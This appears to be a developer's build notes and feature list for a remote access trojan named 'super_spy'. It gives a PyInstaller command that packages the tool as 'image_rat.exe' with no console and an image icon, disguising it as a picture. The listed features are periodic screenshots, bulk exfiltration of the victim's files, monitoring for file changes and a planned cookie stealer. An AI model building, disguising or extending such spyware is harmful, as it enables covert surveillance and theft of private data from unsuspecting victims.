pip install pyautogui requests pynput

python "C:\Users\Admin\AppData\Roaming\Python\Python311\Scripts\pyinstaller.exe" --onefile --noconsole  --add-data "C:\Users\Admin\OneDrive\OneSyncFiles\super_spy\res\image.png;." --name image_rat.exe --icon "C:\Users\Admin\OneDrive\OneSyncFiles\super_spy\icons\jpg .ico" rs.py

###########################################
		features
###########################################
1. can send screenshot in every 20 second
3. can sent entire pc files which is under 100 mb
4. detect files size changes and sent it further
5. send file by their file type (jpg, audio,video, other files)



##############################################
upcoming
##############################################
More advanced
Add another notification group          x
Add cookie stealer                      
Remove fail file sent message			x
Fix repeat file sent(reload log file)	x
Add remote settings                     x
